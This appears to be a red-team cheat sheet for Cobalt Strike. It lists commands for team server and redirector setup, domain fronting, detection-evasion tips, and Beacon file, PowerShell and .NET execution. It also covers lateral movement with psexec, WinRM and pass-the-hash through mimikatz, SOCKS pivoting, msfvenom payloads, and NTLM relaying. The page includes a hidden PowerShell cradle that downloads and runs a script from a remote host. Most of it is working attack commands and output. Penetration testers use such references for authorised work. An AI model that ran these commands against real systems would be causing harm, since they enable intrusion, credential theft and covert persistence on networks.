Cobalt Strike

Cobalt Strike is threat emulation software. Red teams and penetration testers use Cobalt Strike to demonstrate the risk of a breach and evaluate mature security programs. Cobalt Strike exploits network vulnerabilities, launches spear phishing campaigns, hosts web drive-by attacks, and generates malware infected files from a powerful graphical user interface that encourages collaboration and reports all activity.

sudo apt-get update
sudo apt-get install openjdk-11-jdk
sudo apt install proxychains socat
sudo update-java-alternatives -s java-1.11.0-openjdk-amd64
sudo ./teamserver 10.10.10.10 "password" [malleable C2 profile]
./cobaltstrike
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://campaigns.example.com/download/dnsback'))"

Summary

Infrastructure

Redirectors

sudo apt install socat
socat TCP4-LISTEN:80,fork TCP4:[TEAM SERVER]:80

Domain Fronting

New Listener > HTTP Host Header
Choose a domain in "Finance & Healthcare" sector

OpSec

Don't

Use default self-signed HTTPS certificate
Use default port (50050)
Use 0.0.0.0 DNS response
Metasploit compatibility, ask for a payload : wget -U "Internet Explorer" http://127.0.0.1/vl6D

Use a redirector (Apache, CDN, ...)
Firewall to only accept HTTP/S from the redirectors
Firewall 50050 and access via SSH tunnel
Edit default HTTP 404 page and Content type: text/plain
No staging set hosts_stage to false in Malleable C2
Use Malleable Profile to taylor your attack to specific actors

Customer ID

The Customer ID is a 4-byte number associated with a Cobalt Strike license key. Cobalt Strike 3.9 and later embed this information into the payload stagers and stages generated by Cobalt Strike.

The Customer ID value is the last 4-bytes of a Cobalt Strike payload stager in Cobalt Strike 3.9 and later.
The trial has a Customer ID value of 0.
Cobalt Strike does not use the Customer ID value in its network traffic or other parts of the tool

Malleable C2

List of Malleable Profiles hosted on Github

Cobalt Strike - Malleable C2 Profiles xx0hcd/Malleable-C2-Profiles
Cobalt Strike Malleable C2 Design and Reference Guide threatexpress/malleable-c2
Malleable-C2-Profiles rsmudge/Malleable-C2-Profiles
SourcePoint is a C2 profile generator Tylous/SourcePoint

Example of syntax

set useragent "SOME AGENT"; # GOOD
set useragent 'SOME AGENT'; # BAD
prepend "This is an example;";

# Escape Double quotes
append "here is \"some\" stuff";
# Escape Backslashes
append "more \\ stuff";
# Some special characters do not need escaping
prepend "!@#$%^&*()";

Check a profile with ./c2lint.

A result of 0 is returned if c2lint completes with no errors
A result of 1 is returned if c2lint completes with only warnings
A result of 2 is returned if c2lint completes with only errors
A result of 3 is returned if c2lint completes with both errors and warning

Files

# List the file on the specified directory
beacon > ls <C:\Path>

# Change into the specified working directory
beacon > cd [directory]

# Delete a file\folder
beacon > rm [file\folder]

# File copy
beacon > cp [src] [dest]

# Download a file from the path on the Beacon host
beacon > download [C:\filePath]

# Lists downloads in progress
beacon > downloads

# Cancel a download currently in progress
beacon > cancel [*file*]

# Upload a file from the attacker to the current Beacon host
beacon > upload [/path/to/file]

Powershell and .NET

Powershell commands

# Import a Powershell .ps1 script from the control server and save it in memory in Beacon
beacon > powershell-import [/path/to/script.ps1]

# Setup a local TCP server bound to localhost and download the script imported from above using powershell.exe. Then the specified function and any arguments are executed and output is returned.
beacon > powershell [commandlet][arguments]

# Launch the given function using Unmanaged Powershell, which does not start powershell.exe. The program used is set by spawnto
beacon > powerpick [commandlet] [argument]

# Inject Unmanaged Powershell into a specific process and execute the specified command. This is useful for long-running Powershell jobs
beacon > psinject [pid][arch] [commandlet] [arguments]

.NET remote execution

Run a local .NET executable as a Beacon post-exploitation job.

Require:

Binaries compiled with the "Any CPU" configuration.

beacon > execute-assembly [/path/to/script.exe] [arguments]
beacon > execute-assembly /home/audit/Rubeus.exe
[*] Tasked beacon to run .NET program: Rubeus.exe
[+] host called home, sent: 318507 bytes
[+] received output:

   ______        _                      
  (_____ \      | |                     
   _____) )_   _| |__  _____ _   _  ___ 
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2

Lateral Movement

⚠️ OPSEC Advice: Use the spawnto command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe

portscan: Performs a portscan on a specific target.
runas: A wrapper of runas.exe, using credentials you can run a command as another user.
pth: By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. ❗ This module needs Administrator privileges.
steal_token: Steal a token from a specified process.
make_token: By providing credentials you can create an impersonation token into the current process and execute commands from the context of the impersonated user.
jump: Provides easy and quick way to move lateraly using winrm or psexec to spawn a new beacon session on a target. ❗ The jump module will use the current delegation/impersonation token to authenticate on the remote target. 💪 We can combine the jump module with the make_token or pth module for a quick "jump" to another target on the network.
remote-exec: Execute a command on a remote target using psexec, winrm or wmi. ❗ The remote-exec module will use the current delegation/impersonation token to authenticate on the remote target.
ssh/ssh-key: Authenticate using ssh with password or private key. Works for both linux and windows hosts.

⚠️ All the commands launch powershell.exe

Beacon Remote Exploits
======================
jump [module] [target] [listener] 

    psexec x86 Use a service to run a Service EXE artifact
    psexec64 x64 Use a service to run a Service EXE artifact
    psexec_psh x86 Use a service to run a PowerShell one-liner
    winrm x86 Run a PowerShell script via WinRM
    winrm64 x64 Run a PowerShell script via WinRM

Beacon Remote Execute Methods
=============================
remote-exec [module] [target] [command] 

    Methods                         Description
    -------                         -----------
    psexec                          Remote execute via Service Control Manager
    winrm                           Remote execute via WinRM (PowerShell)
    wmi                             Remote execute via WMI (PowerShell)

Opsec safe Pass-the-Hash:

mimikatz sekurlsa::pth /user:xxx /domain:xxx /ntlm:xxxx /run:"powershell -w hidden"
steal_token PID

Assume Control of Artifact

Use link to connect to SMB Beacon
Use connect to connect to TCP Beacon

VPN & Pivots

⚠️ Covert VPN doesn't work with W10, and requires Administrator access to deploy.

Use socks 8080 to setup a SOCKS4a proxy server on port 8080 (or any other port you choose). This will setup a SOCKS proxy server to tunnel traffic through Beacon. Beacon's sleep time adds latency to any traffic you tunnel through it. Use sleep 0 to make Beacon check-in several times a second.

# Start a SOCKS server on the given port on your teamserver, tunneling traffic through the specified Beacon. Set the teamserver/port configuration in /etc/proxychains.conf for easy usage.
beacon > socks [PORT]
beacon > socks [port]
beacon > socks [port] [socks4]
beacon > socks [port] [socks5]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password]
beacon > socks [port] [socks5] [enableNoAuth|disableNoAuth] [user] [password] [enableLogging|disableLogging]

# Proxy browser traffic through a specified Internet Explorer process.
beacon > browserpivot [pid] [x86|x64]

# Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
beacon > rportfwd [bind port] [forward host] [forward port]

# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller.    ~=  rportfwd + shspawn.
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin

# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller
# then you can handle the connect back on your MSF multi handler
beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin

Beacon Object Files

A BOF is just a block of position-independent code that receives pointers to some Beacon internal APIs

Example: https://github.com/Cobalt-Strike/bof_template/blob/main/beacon.h

Compile

# To compile this with Visual Studio:
cl.exe /c /GS- hello.c /Fohello.o

# To compile this with x86 MinGW:
i686-w64-mingw32-gcc -c hello.c -o hello.o

# To compile this with x64 MinGW:
x86_64-w64-mingw32-gcc -c hello.c -o hello.o

Execute: inline-execute /path/to/hello.o

NTLM Relaying via Cobalt Strike

beacon> socks 1080
kali> proxychains python3 /usr/local/bin/ntlmrelayx.py -t smb://<IP_TARGET>
beacon> rportfwd_local 8445 <IP_KALI> 445
beacon> upload C:\Tools\PortBender\WinDivert64.sys
beacon> PortBender redirect 445 8445

References

Last updated 5 months ago

hashtagSummary

hashtagInfrastructure

hashtagRedirectors

hashtagDomain Fronting

hashtagOpSec

hashtagCustomer ID

hashtagMalleable C2

hashtagFiles

hashtagPowershell and .NET

hashtagPowershell commands

hashtag.NET remote execution

hashtagLateral Movement

hashtagAssume Control of Artifact

hashtagVPN & Pivots

hashtagBeacon Object Files

hashtagNTLM Relaying via Cobalt Strike

hashtagReferences